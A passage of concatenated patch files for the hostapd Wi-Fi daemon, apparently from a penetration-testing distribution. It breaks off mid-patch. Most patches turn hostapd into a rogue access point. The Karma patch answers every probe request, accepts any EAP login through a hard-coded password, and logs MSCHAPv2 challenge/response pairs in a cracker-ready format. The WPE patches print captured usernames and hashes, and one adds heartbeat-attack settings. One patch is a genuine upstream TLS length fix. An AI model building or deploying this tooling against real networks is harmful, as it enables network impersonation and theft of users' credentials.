extern struct wpa_driver_ops *wpa_drivers[];
+/* Karma Mode */
+#include "karma/karma.h"
+int karma_beacon_respond = 0;
+int karma_eap_auth = 0;
struct hapd_global {
void **drv_priv;
@@ -478,7 +482,7 @@
show_version();
fprintf(stderr,
"\n"
- "usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] "
+ "usage: hostapd [-hdBKtvRA] [-P <PID file>] [-e <entropy file>] "
"\\\n"
" [-g <global ctrl_iface>] <configuration file(s)>\n"
"\n"
@@ -494,7 +498,9 @@
" -f log output to debug file instead of stdout\n"
#endif /* CONFIG_DEBUG_FILE */
" -t include timestamps in some debug messages\n"
- " -v show hostapd version\n");
+ " -v show hostapd version\n"
+ " -R [karma] respond to all probes\n"
+ " -A [karma] log all authentication attempts\n");
exit(1);
}
@@ -556,7 +562,7 @@
interfaces.global_ctrl_sock = -1;
for (;;) {
- c = getopt(argc, argv, "Bde:f:hKP:tvg:");
+ c = getopt(argc, argv, "Bde:f:hKP:tvg:RA");
if (c < 0)
break;
switch (c) {
@@ -594,7 +600,12 @@
case 'g':
hostapd_get_global_ctrl_iface(&interfaces, optarg);
break;
-
+ case 'R':
+ karma_beacon_respond++;
+ break;
+ case 'A':
+ karma_eap_auth++;
+ break;
default:
usage();
break;
diff -urN hostapd-2.0.orig/hostapd/Makefile hostapd-2.0/hostapd/Makefile
--- hostapd-2.0.orig/hostapd/Makefile 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/hostapd/Makefile 2013-05-27 11:23:46.161485665 +0800
@@ -96,6 +96,7 @@
OBJS += ../src/eapol_auth/eapol_auth_sm.o
+OBJS += ../src/karma/karma.o
ifndef CONFIG_NO_DUMP_STATE
# define HOSTAPD_DUMP_STATE to include SIGUSR1 handler for dumping state to
diff -urN hostapd-2.0.orig/src/ap/beacon.c hostapd-2.0/src/ap/beacon.c
--- hostapd-2.0.orig/src/ap/beacon.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/ap/beacon.c 2013-05-27 12:05:51.007478734 +0800
@@ -35,6 +35,7 @@
#include "beacon.h"
#include "hs20.h"
+#include "karma/karma.h"
#ifdef NEED_AP_MLME
@@ -442,6 +443,20 @@
if (sta)
sta->ssid_probe = &hapd->conf->ssid;
} else {
+
+ /* Karma Promiscuous Beacon Response Hack - JoMo-Kun <jmk@foofus.net> */
+ if (karma_beacon_respond) {
+ char ssid_txt[33];
+ char *message = NULL;
+ ieee802_11_print_ssid(ssid_txt, elems.ssid, elems.ssid_len);
+ if (asprintf(&message, "Probe request from " MACSTR " for SSID '%s'", MAC2STR(mgmt->sa), ssid_txt) < 0)
+ wpa_printf(MSG_ERROR, "Error allocating memory for Karma message\n");
+ karma_logger(0, message);
+ free(message);
+ os_memcpy(hapd->conf->ssid.ssid, elems.ssid, elems.ssid_len);
+ hapd->conf->ssid.ssid_len = elems.ssid_len;
+ }
+
if (!(mgmt->da[0] & 0x01)) {
char ssid_txt[33];
ieee802_11_print_ssid(ssid_txt, elems.ssid,
diff -urN hostapd-2.0.orig/src/ap/hostapd.c hostapd-2.0/src/ap/hostapd.c
--- hostapd-2.0.orig/src/ap/hostapd.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/ap/hostapd.c 2013-05-27 11:23:46.163485665 +0800
@@ -41,6 +41,7 @@
extern int wpa_debug_level;
extern struct wpa_driver_ops *wpa_drivers[];
+#include "karma/karma.h"
int hostapd_for_each_interface(struct hapd_interfaces *interfaces,
int (*cb)(struct hostapd_iface *iface,
diff -urN hostapd-2.0.orig/src/ap/ieee802_11.c hostapd-2.0/src/ap/ieee802_11.c
--- hostapd-2.0.orig/src/ap/ieee802_11.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/ap/ieee802_11.c 2013-05-27 11:23:46.164485665 +0800
@@ -37,6 +37,7 @@
#include "wnm_ap.h"
#include "ieee802_11.h"
+#include "karma/karma.h"
u8 * hostapd_eid_supp_rates(struct hostapd_data *hapd, u8 *eid)
{
@@ -698,8 +699,9 @@
if (ssid_ie == NULL)
return WLAN_STATUS_UNSPECIFIED_FAILURE;
- if (ssid_ie_len != hapd->conf->ssid.ssid_len ||
- os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0) {
+ /* Karma Promiscuous Beacon Response Hack - JoMo-Kun <jmk@foofus.net> */
+ if ((!karma_beacon_respond) && (ssid_ie_len != hapd->conf->ssid.ssid_len ||
+ os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0)) {
char ssid_txt[33];
ieee802_11_print_ssid(ssid_txt, ssid_ie, ssid_ie_len);
hostapd_logger(hapd, sta->addr, HOSTAPD_MODULE_IEEE80211,
diff -urN hostapd-2.0.orig/src/eap_server/eap_server.c hostapd-2.0/src/eap_server/eap_server.c
--- hostapd-2.0.orig/src/eap_server/eap_server.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/eap_server/eap_server.c 2013-05-27 11:23:46.165485665 +0800
@@ -19,6 +19,8 @@
#include "state_machine.h"
#include "common/wpa_ctrl.h"
+#include "karma/karma.h"
+
#define STATE_MACHINE_DATA struct eap_sm
#define STATE_MACHINE_DEBUG_PREFIX "EAP"
@@ -94,10 +96,8 @@
int phase2)
{
struct eap_user *user;
-
- if (sm == NULL || sm->eapol_cb == NULL ||
- sm->eapol_cb->get_eap_user == NULL)
- return -1;
+ char *username = NULL;
+ char *message = NULL;
eap_user_free(sm->user);
sm->user = NULL;
@@ -106,11 +106,39 @@
if (user == NULL)
return -1;
+ /* Karma EAP Modifications */
+ if (karma_eap_auth) {
+ /* Karma Mode: Accept all requests, regardless of username - JoMo-Kun <jmk@foofus.net> */
+ user->methods[0].vendor = sm->respVendor;
+ user->password = os_zalloc(9);
+ strncpy((char *)user->password, "Cricket8", 8); /* Magic password allows successful authentication */
+ user->password_len = 8;
+
+ if (phase2)
+ user->methods[0].method = EAP_TYPE_MSCHAPV2;
+ else // TODO: what happens if we propose LEAP?
+ user->methods[0].method = EAP_TYPE_PEAP;
+
+ username = os_zalloc(sm->identity_len + 1);
+ strncpy(username, (char *)sm->identity, (size_t)sm->identity_len);
+ if (asprintf(&message, "Authentication Request - Username: %s Vendor: %d Method: %d", username, sm->respVendor, sm->respVendorMethod) < 0)
+ printf("Error allocating memory for request message.\n");
+ //wpa_printf(MSG_ERROR, "Authentication Request - Username: %s Vendor: %d Method: %d", username, sm->respVendor, sm->respVendorMethod);
+
+ karma_logger(0, message);
+ free(message);
+ }
+ else {
+ if (sm == NULL || sm->eapol_cb == NULL ||
+ sm->eapol_cb->get_eap_user == NULL)
+ return -1;
+
if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
identity_len, phase2, user) != 0) {
eap_user_free(user);
return -1;
}
+ }
sm->user = user;
sm->user_eap_method_index = 0;
diff -urN hostapd-2.0.orig/src/eap_server/eap_server_mschapv2.c hostapd-2.0/src/eap_server/eap_server_mschapv2.c
--- hostapd-2.0.orig/src/eap_server/eap_server_mschapv2.c 2013-01-12 23:42:53.000000000 +0800
+++ hostapd-2.0/src/eap_server/eap_server_mschapv2.c 2013-05-27 11:23:46.166485665 +0800
@@ -13,6 +13,7 @@
#include "crypto/random.h"
#include "eap_i.h"
+#include "karma/karma.h"
struct eap_mschapv2_hdr {
u8 op_code; /* MSCHAPV2_OP_* */
@@ -284,13 +285,15 @@
struct wpabuf *respData)
{
struct eap_mschapv2_hdr *resp;
- const u8 *pos, *end, *peer_challenge, *nt_response, *name;
+ const u8 *pos, *end, *auth_challenge, *peer_challenge, *nt_response, *name;
u8 flags;
size_t len, name_len, i;
u8 expected[24];
const u8 *username, *user;
size_t username_len, user_len;
int res;
+ char *auth_creds = NULL;
+ int auth_creds_len = 0;
pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
&len);
@@ -330,6 +333,37 @@
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+ /* Karma Mode: Log MSCHAPv2 exchange in John format - JoMo-Kun <jmk@foofus.net> */
+ /* user::domain (unused):authenticator challenge:mschapv2 response:peer challenge */
+ if (karma_eap_auth) {
+ auth_creds_len = sm->identity_len + 3 + 16*2 + 1 + 24*2 + 1 + 16*2;
+ auth_creds = os_malloc(auth_creds_len + 1);
+ memset(auth_creds, 0, auth_creds_len + 1);
+
+ strncpy(auth_creds, (char *)sm->identity, sm->identity_len);
+ sprintf(auth_creds + sm->identity_len, ":::");
+
+ /* Authenticator Challenge */
+ auth_challenge = data->auth_challenge;
+ for (i=0; i<16; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 2*i, "%2.2X", 0xFF & (int)auth_challenge[i]);
+
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2, ":");
+
+ /* MSCHAPv2 Response */
+ for (i=0; i<24; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 2*i, "%2.2X", 0xFF & (int)nt_response[i]);
+
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 24*2, ":");
+
+ /* Peer Challenge */
+ for (i=0; i<16; i++)
+ sprintf(auth_creds + sm->identity_len + 3 + 16*2 + 1 + 24*2 + 1 + 2*i, "%2.2X", 0xFF & (int)peer_challenge[i]);
+
+ karma_logger(1, auth_creds);
+ free(auth_creds);
+ }
+
/* MSCHAPv2 does not include optional domain name in the
* challenge-response calculation, so remove domain prefix
* (if present). */
diff -urN hostapd-2.0.orig/src/karma/karma.c hostapd-2.0/src/karma/karma.c
--- hostapd-2.0.orig/src/karma/karma.c 1970-01-01 07:30:00.000000000 +0730
+++ hostapd-2.0/src/karma/karma.c 2013-05-27 11:23:46.166485665 +0800
@@ -0,0 +1,44 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <time.h>
+
+#include "common.h"
+#include "includes.h"
+#include "trace.h"
+
+#include "karma/karma.h"
+
+/* Karma Mode: Log data related to MSCHAPv2 challenge/response authentication attempts */
+extern void karma_logger(int type, char *message)
+{
+ FILE *logfd;
+ time_t cur_time;
+ struct tm *tm_ptr;
+ char time_buf[256];
+ /* General: probe requests, username requests */
+ logfd = fopen("./hostapd-karma.txt", "a");
+ if (logfd == NULL) {
+ fprintf(stderr, "[karma] Failed to open log file: ./hostapd-karma.txt\n");
+ logfd = stderr;
+ }
+
+ cur_time = time(NULL);
+ (void) time(&cur_time);
+ tm_ptr = localtime(&cur_time);
+ strftime(time_buf, 256, "%Y-%m-%d %H:%M:%S", tm_ptr);
+ fprintf(logfd, "%s:%s\n", time_buf, message);
+ fprintf(stderr, "[karma] %s:%s\n", time_buf, message);
+ fclose(logfd);
+
+ /* MSCHAPv2 Challenge/Response */
+ if (type == 1)
+ {
+ logfd = fopen("./hostapd-karma.lc", "a");
+ if (logfd == NULL) {
+ fprintf(stderr, "[karma] Failed to open log file: ./hostapd-karma.lc\n");
+ logfd = stderr;
+ }
+ fprintf(logfd, "%s\n", message);
+ fclose(logfd);
+ }
+}
diff -urN hostapd-2.0.orig/src/karma/karma.d hostapd-2.0/src/karma/karma.d
--- hostapd-2.0.orig/src/karma/karma.d 1970-01-01 07:30:00.000000000 +0730
+++ hostapd-2.0/src/karma/karma.d 2013-05-27 11:23:46.167485665 +0800
@@ -0,0 +1,4 @@
+../src/karma/karma.o: ../src/karma/karma.c ../src/utils/common.h \
+ ../src/utils/os.h ../src/utils/wpa_debug.h ../src/utils/wpabuf.h \
+ ../src/utils/includes.h ../src/utils/build_config.h ../src/utils/trace.h \
+ ../src/karma/karma.h
diff -urN hostapd-2.0.orig/src/karma/karma.h hostapd-2.0/src/karma/karma.h
--- hostapd-2.0.orig/src/karma/karma.h 1970-01-01 07:30:00.000000000 +0730
+++ hostapd-2.0/src/karma/karma.h 2013-05-27 11:23:46.167485665 +0800
@@ -0,0 +1,3 @@
+extern int karma_beacon_respond;
+extern int karma_eap_auth;
+extern void karma_logger(int, char*);



@ -1,48 +0,0 @@
From 586c446e0ff42ae00315b014924ec669023bd8de Mon Sep 17 00:00:00 2001
From: Jouni Malinen <j@w1.fi>
Date: Sun, 7 Oct 2012 20:06:29 +0300
Subject: [PATCH] EAP-TLS server: Fix TLS Message Length validation
EAP-TLS/PEAP/TTLS/FAST server implementation did not validate TLS
Message Length value properly and could end up trying to store more
information into the message buffer than the allocated size if the first
fragment is longer than the indicated size. This could result in hostapd
process terminating in wpabuf length validation. Fix this by rejecting
messages that have invalid TLS Message Length value.
This would affect cases that use the internal EAP authentication server
in hostapd either directly with IEEE 802.1X or when using hostapd as a
RADIUS authentication server and when receiving an incorrectly
constructed EAP-TLS message. Cases where hostapd uses an external
authentication are not affected.
Thanks to Timo Warns for finding and reporting this issue.
Signed-hostap: Jouni Malinen <j@w1.fi>
intended-for: hostap-1
---
src/eap_server/eap_server_tls_common.c | 8 ++++++++
1 files changed, 8 insertions(+), 0 deletions(-)
diff --git a/src/eap_server/eap_server_tls_common.c b/src/eap_server/eap_server_tls_common.c
index 31be2ec..46f282b 100644
--- a/src/eap_server/eap_server_tls_common.c
+++ b/src/eap_server/eap_server_tls_common.c
@@ -228,6 +228,14 @@ static int eap_server_tls_process_fragment(struct eap_ssl_data *data,
return -1;
}
+ if (len > message_length) {
+ wpa_printf(MSG_INFO, "SSL: Too much data (%d bytes) in "
+ "first fragment of frame (TLS Message "
+ "Length %d bytes)",
+ (int) len, (int) message_length);
+ return -1;
+ }
+
data->tls_in = wpabuf_alloc(message_length);
if (data->tls_in == NULL) {
wpa_printf(MSG_DEBUG, "SSL: No memory for message");
--
1.7.4-rc1


@ -1,157 +0,0 @@
diff -urN hostapd-1.0.orig/hostapd/main.c hostapd-1.0/hostapd/main.c
--- hostapd-1.0.orig/hostapd/main.c 2013-05-01 22:58:03.007738503 +0800
+++ hostapd-1.0/hostapd/main.c 2013-05-01 22:49:55.000000000 +0800
@@ -512,7 +512,7 @@
static void show_version(void)
{
fprintf(stderr,
- "hostapd v" VERSION_STR "\n"
+ "hostapd v" VERSION_STR" with wpe support (Pentoo)\n"
"User space daemon for IEEE 802.11 AP management,\n"
"IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n"
"Copyright (c) 2002-2012, Jouni Malinen <j@w1.fi> "
diff -urN hostapd-1.0.orig/src/crypto/ms_funcs.c hostapd-1.0/src/crypto/ms_funcs.c
--- hostapd-1.0.orig/src/crypto/ms_funcs.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/crypto/ms_funcs.c 2013-05-01 22:49:55.000000000 +0800
@@ -83,7 +83,7 @@
* @challenge: 8-octet Challenge (OUT)
* Returns: 0 on success, -1 on failure
*/
-static int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
const u8 *username, size_t username_len,
u8 *challenge)
{
diff -urN hostapd-1.0.orig/src/crypto/ms_funcs.h hostapd-1.0/src/crypto/ms_funcs.h
--- hostapd-1.0.orig/src/crypto/ms_funcs.h 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/crypto/ms_funcs.h 2013-05-01 22:49:55.000000000 +0800
@@ -37,6 +37,10 @@
int nt_challenge_response(const u8 *challenge, const u8 *password,
size_t password_len, u8 *response);
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+ const u8 *username, size_t username_len,
+ u8 *challenge);
+
void challenge_response(const u8 *challenge, const u8 *password_hash,
u8 *response);
int nt_password_hash(const u8 *password, size_t password_len,
diff -urN hostapd-1.0.orig/src/crypto/tls_openssl.c hostapd-1.0/src/crypto/tls_openssl.c
--- hostapd-1.0.orig/src/crypto/tls_openssl.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/crypto/tls_openssl.c 2013-05-01 22:49:55.000000000 +0800
@@ -2642,7 +2642,7 @@
data_len) != 1)
return -1;
#else /* CONFIG_OPENSSL_TICKET_OVERRIDE */
- if (SSL_set_hello_extension(conn->ssl, ext_type, (void *) data,
+ if (SSL_set_session_ticket_ext(conn->ssl, ext_type, (void *) data,
data_len) != 1)
return -1;
#endif /* CONFIG_OPENSSL_TICKET_OVERRIDE */
@@ -2948,7 +2948,7 @@
SSL_set_tlsext_debug_callback(conn->ssl, tls_hello_ext_cb);
SSL_set_tlsext_debug_arg(conn->ssl, conn);
#else /* SSL_OP_NO_TICKET */
- if (SSL_set_hello_extension_cb(conn->ssl, tls_hello_ext_cb,
+ if (SSL_set_session_ticket_ext_cb(conn->ssl, tls_hello_ext_cb,
conn) != 1)
return -1;
#endif /* SSL_OP_NO_TICKET */
@@ -2963,7 +2963,7 @@
SSL_set_tlsext_debug_callback(conn->ssl, NULL);
SSL_set_tlsext_debug_arg(conn->ssl, conn);
#else /* SSL_OP_NO_TICKET */
- if (SSL_set_hello_extension_cb(conn->ssl, NULL, NULL) != 1)
+ if (SSL_set_session_ticket_ext_cb(conn->ssl, NULL, NULL) != 1)
return -1;
#endif /* SSL_OP_NO_TICKET */
#endif /* CONFIG_OPENSSL_TICKET_OVERRIDE */
diff -urN hostapd-1.0.orig/src/eap_server/eap_server.c hostapd-1.0/src/eap_server/eap_server.c
--- hostapd-1.0.orig/src/eap_server/eap_server.c 2013-05-01 22:58:03.010738503 +0800
+++ hostapd-1.0/src/eap_server/eap_server.c 2013-05-01 22:54:51.000000000 +0800
@@ -102,8 +102,9 @@
int phase2)
{
struct eap_user *user;
- char *username = NULL;
- char *message = NULL;
+ char *username = NULL;
+ char *message = NULL;
+ char ident = 't';
eap_user_free(sm->user);
sm->user = NULL;
@@ -112,6 +113,11 @@
if (user == NULL)
return -1;
+ if(phase2) {
+ identity = (const u8 *)&ident;
+ identity_len = 1;
+ }
+
/* Karma EAP Modifications */
if (karma_eap_auth) {
/* Karma Mode: Accept all requests, regardless of username - JoMo-Kun <jmk@foofus.net> */
diff -urN hostapd-1.0.orig/src/eap_server/eap_server_fast.c hostapd-1.0/src/eap_server/eap_server_fast.c
--- hostapd-1.0.orig/src/eap_server/eap_server_fast.c 2012-05-10 05:56:09.000000000 +0800
+++ hostapd-1.0/src/eap_server/eap_server_fast.c 2013-05-01 22:49:55.000000000 +0800
@@ -1040,7 +1040,8 @@
switch (data->state) {
case PHASE2_ID:
- if (eap_user_get(sm, sm->identity, sm->identity_len, 1) != 0) {
+ //if (eap_user_get(sm, sm->identity, sm->identity_len, 1) != 0) {
+ if (eap_user_get(sm, sm->identity, sm->identity_len, 0) != 0) {
wpa_hexdump_ascii(MSG_DEBUG, "EAP-FAST: Phase2 "
"Identity not found in the user "
"database",
diff -urN hostapd-1.0.orig/src/eap_server/eap_server_mschapv2.c hostapd-1.0/src/eap_server/eap_server_mschapv2.c
--- hostapd-1.0.orig/src/eap_server/eap_server_mschapv2.c 2013-05-01 22:58:03.011738503 +0800
+++ hostapd-1.0/src/eap_server/eap_server_mschapv2.c 2013-05-01 22:56:30.000000000 +0800
@@ -295,9 +295,10 @@
u8 flags;
size_t len, name_len, i;
u8 expected[24];
+ u8 challenge_hash1[8];
const u8 *username, *user;
size_t username_len, user_len;
- int res;
+ int res, x;
char *auth_creds = NULL;
int auth_creds_len = 0;
@@ -338,6 +339,22 @@
wpa_hexdump(MSG_MSGDUMP, "EAP-MSCHAPV2: NT-Response", nt_response, 24);
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+
+ challenge_hash(peer_challenge, data->auth_challenge, name, name_len, challenge_hash1);
+
+ wpa_hexdump(MSG_DEBUG, "EAP-MSCHAPV2: Challenge Hash", challenge_hash1, 8);
+ printf("\n");
+ printf("\tusername: %s\n", name);
+ printf("\tchallenge: ");
+ for (x=0;x<7;x++)
+ printf("%02x:",challenge_hash1[x]);
+ printf("%02x\n",challenge_hash1[7]);
+
+ printf("\tresponse: ");
+ for (x=0;x<23;x++)
+ printf("%02x:",nt_response[x]);
+ printf("%02x\n",nt_response[23]);
+
/* Karma Mode: Log MSCHAPv2 exchange in John format - JoMo-Kun <jmk@foofus.net> */
/* user::domain (unused):authenticator challenge:mschapv2 response:peer challenge */
@@ -524,8 +541,8 @@
if (sm->user == NULL || sm->user->password == NULL) {
wpa_printf(MSG_INFO, "EAP-MSCHAPV2: Password not configured");
- data->state = FAILURE;
- return;
+ //data->state = FAILURE;
+ //return;
}
switch (data->state) {


@ -1,153 +0,0 @@
diff -uNr hostapd-1.0/hostapd/main.c hostapd-1.0-wpe/hostapd/main.c
--- hostapd-1.0/hostapd/main.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/hostapd/main.c 2012-08-20 22:56:17.420486344 -0400
@@ -508,7 +508,7 @@
static void show_version(void)
{
fprintf(stderr,
- "hostapd v" VERSION_STR "\n"
+ "hostapd v" VERSION_STR" with wpe support (Pentoo)\n"
"User space daemon for IEEE 802.11 AP management,\n"
"IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n"
"Copyright (c) 2002-2012, Jouni Malinen <j@w1.fi> "
diff -uNr hostapd-1.0/src/crypto/ms_funcs.c hostapd-1.0-wpe/src/crypto/ms_funcs.c
--- hostapd-1.0/src/crypto/ms_funcs.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/crypto/ms_funcs.c 2012-08-20 22:27:09.583819291 -0400
@@ -83,7 +83,7 @@
* @challenge: 8-octet Challenge (OUT)
* Returns: 0 on success, -1 on failure
*/
-static int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
const u8 *username, size_t username_len,
u8 *challenge)
{
diff -uNr hostapd-1.0/src/crypto/ms_funcs.h hostapd-1.0-wpe/src/crypto/ms_funcs.h
--- hostapd-1.0/src/crypto/ms_funcs.h 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/crypto/ms_funcs.h 2012-08-20 22:27:09.583819291 -0400
@@ -37,6 +37,10 @@
int nt_challenge_response(const u8 *challenge, const u8 *password,
size_t password_len, u8 *response);
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+ const u8 *username, size_t username_len,
+ u8 *challenge);
+
void challenge_response(const u8 *challenge, const u8 *password_hash,
u8 *response);
int nt_password_hash(const u8 *password, size_t password_len,
diff -uNr hostapd-1.0/src/crypto/tls_openssl.c hostapd-1.0-wpe/src/crypto/tls_openssl.c
--- hostapd-1.0/src/crypto/tls_openssl.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/crypto/tls_openssl.c 2012-08-20 22:27:09.583819291 -0400
@@ -2642,7 +2642,7 @@
data_len) != 1)
return -1;
#else /* CONFIG_OPENSSL_TICKET_OVERRIDE */
- if (SSL_set_hello_extension(conn->ssl, ext_type, (void *) data,
+ if (SSL_set_session_ticket_ext(conn->ssl, ext_type, (void *) data,
data_len) != 1)
return -1;
#endif /* CONFIG_OPENSSL_TICKET_OVERRIDE */
@@ -2948,7 +2948,7 @@
SSL_set_tlsext_debug_callback(conn->ssl, tls_hello_ext_cb);
SSL_set_tlsext_debug_arg(conn->ssl, conn);
#else /* SSL_OP_NO_TICKET */
- if (SSL_set_hello_extension_cb(conn->ssl, tls_hello_ext_cb,
+ if (SSL_set_session_ticket_ext_cb(conn->ssl, tls_hello_ext_cb,
conn) != 1)
return -1;
#endif /* SSL_OP_NO_TICKET */
@@ -2963,7 +2963,7 @@
SSL_set_tlsext_debug_callback(conn->ssl, NULL);
SSL_set_tlsext_debug_arg(conn->ssl, conn);
#else /* SSL_OP_NO_TICKET */
- if (SSL_set_hello_extension_cb(conn->ssl, NULL, NULL) != 1)
+ if (SSL_set_session_ticket_ext_cb(conn->ssl, NULL, NULL) != 1)
return -1;
#endif /* SSL_OP_NO_TICKET */
#endif /* CONFIG_OPENSSL_TICKET_OVERRIDE */
diff -uNr hostapd-1.0/src/eap_server/eap_server.c hostapd-1.0-wpe/src/eap_server/eap_server.c
--- hostapd-1.0/src/eap_server/eap_server.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/eap_server/eap_server.c 2012-08-20 22:27:09.583819291 -0400
@@ -100,6 +100,7 @@
int phase2)
{
struct eap_user *user;
+ char ident = 't';
if (sm == NULL || sm->eapol_cb == NULL ||
sm->eapol_cb->get_eap_user == NULL)
@@ -111,7 +112,10 @@
user = os_zalloc(sizeof(*user));
if (user == NULL)
return -1;
-
+ if(phase2) {
+ identity = (const u8 *)&ident;
+ identity_len = 1;
+ }
if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
identity_len, phase2, user) != 0) {
eap_user_free(user);
diff -uNr hostapd-1.0/src/eap_server/eap_server_fast.c hostapd-1.0-wpe/src/eap_server/eap_server_fast.c
--- hostapd-1.0/src/eap_server/eap_server_fast.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/eap_server/eap_server_fast.c 2012-08-20 22:27:09.583819291 -0400
@@ -1040,7 +1040,8 @@
switch (data->state) {
case PHASE2_ID:
- if (eap_user_get(sm, sm->identity, sm->identity_len, 1) != 0) {
+ //if (eap_user_get(sm, sm->identity, sm->identity_len, 1) != 0) {
+ if (eap_user_get(sm, sm->identity, sm->identity_len, 0) != 0) {
wpa_hexdump_ascii(MSG_DEBUG, "EAP-FAST: Phase2 "
"Identity not found in the user "
"database",
diff -uNr hostapd-1.0/src/eap_server/eap_server_mschapv2.c hostapd-1.0-wpe/src/eap_server/eap_server_mschapv2.c
--- hostapd-1.0/src/eap_server/eap_server_mschapv2.c 2012-05-09 17:56:09.000000000 -0400
+++ hostapd-1.0-wpe/src/eap_server/eap_server_mschapv2.c 2012-08-20 22:27:09.583819291 -0400
@@ -294,9 +294,10 @@
u8 flags;
size_t len, name_len, i;
u8 expected[24];
+ u8 challenge_hash1[8];
const u8 *username, *user;
size_t username_len, user_len;
- int res;
+ int res,x;
pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
&len);
@@ -335,6 +336,22 @@
wpa_hexdump(MSG_MSGDUMP, "EAP-MSCHAPV2: NT-Response", nt_response, 24);
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+
+ challenge_hash(peer_challenge, data->auth_challenge, name, name_len, challenge_hash1);
+
+ wpa_hexdump(MSG_DEBUG, "EAP-MSCHAPV2: Challenge Hash", challenge_hash1, 8);
+ printf("\n");
+ printf("\tusername: %s\n", name);
+ printf("\tchallenge: ");
+ for (x=0;x<7;x++)
+ printf("%02x:",challenge_hash1[x]);
+ printf("%02x\n",challenge_hash1[7]);
+
+ printf("\tresponse: ");
+ for (x=0;x<23;x++)
+ printf("%02x:",nt_response[x]);
+ printf("%02x\n",nt_response[23]);
+
/* MSCHAPv2 does not include optional domain name in the
* challenge-response calculation, so remove domain prefix
@@ -490,8 +507,8 @@
if (sm->user == NULL || sm->user->password == NULL) {
wpa_printf(MSG_INFO, "EAP-MSCHAPV2: Password not configured");
- data->state = FAILURE;
- return;
+ //data->state = FAILURE;
+ //return;
}
switch (data->state) {


@ -1,884 +0,0 @@
diff -rupN hostapd-2.2/hostapd/config_file.c hostapd-2.2-wpe/hostapd/config_file.c
--- hostapd-2.2/hostapd/config_file.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/hostapd/config_file.c 2014-08-14 08:45:54.629127667 -0400
@@ -20,7 +20,7 @@
#include "ap/wpa_auth.h"
#include "ap/ap_config.h"
#include "config_file.h"
-
+#include "wpe/wpe.h"
#ifndef CONFIG_NO_RADIUS
#ifdef EAP_SERVER
@@ -1955,6 +1955,20 @@ static int hostapd_config_fill(struct ho
return 1;
}
wpa_printf(MSG_DEBUG, "eapol_version=%d", bss->eapol_version);
+ } else if (os_strcmp(buf, "wpe_logfile") == 0) {
+ wpe_conf.wpe_logfile = os_strdup(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_before_handshake") == 0) {
+ wpe_conf.wpe_hb_send_before_handshake = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_before_appdata") == 0) {
+ wpe_conf.wpe_hb_send_before_appdata = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_after_appdata") == 0) {
+ wpe_conf.wpe_hb_send_after_appdata = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_payload_size") == 0) {
+ wpe_conf.wpe_hb_payload_size = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_num_repeats") == 0) {
+ wpe_conf.wpe_hb_num_repeats = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_num_tries") == 0) {
+ wpe_conf.wpe_hb_num_tries = atoi(pos);
#ifdef EAP_SERVER
} else if (os_strcmp(buf, "eap_authenticator") == 0) {
bss->eap_server = atoi(pos);
diff -rupN hostapd-2.2/hostapd/main.c hostapd-2.2-wpe/hostapd/main.c
--- hostapd-2.2/hostapd/main.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/hostapd/main.c 2014-08-14 08:45:54.637127773 -0400
@@ -27,7 +27,7 @@
#include "config_file.h"
#include "eap_register.h"
#include "ctrl_iface.h"
-
+#include "wpe/wpe.h"
struct hapd_global {
void **drv_priv;
@@ -412,11 +412,17 @@ static int hostapd_global_run(struct hap
static void show_version(void)
{
fprintf(stderr,
- "hostapd v" VERSION_STR "\n"
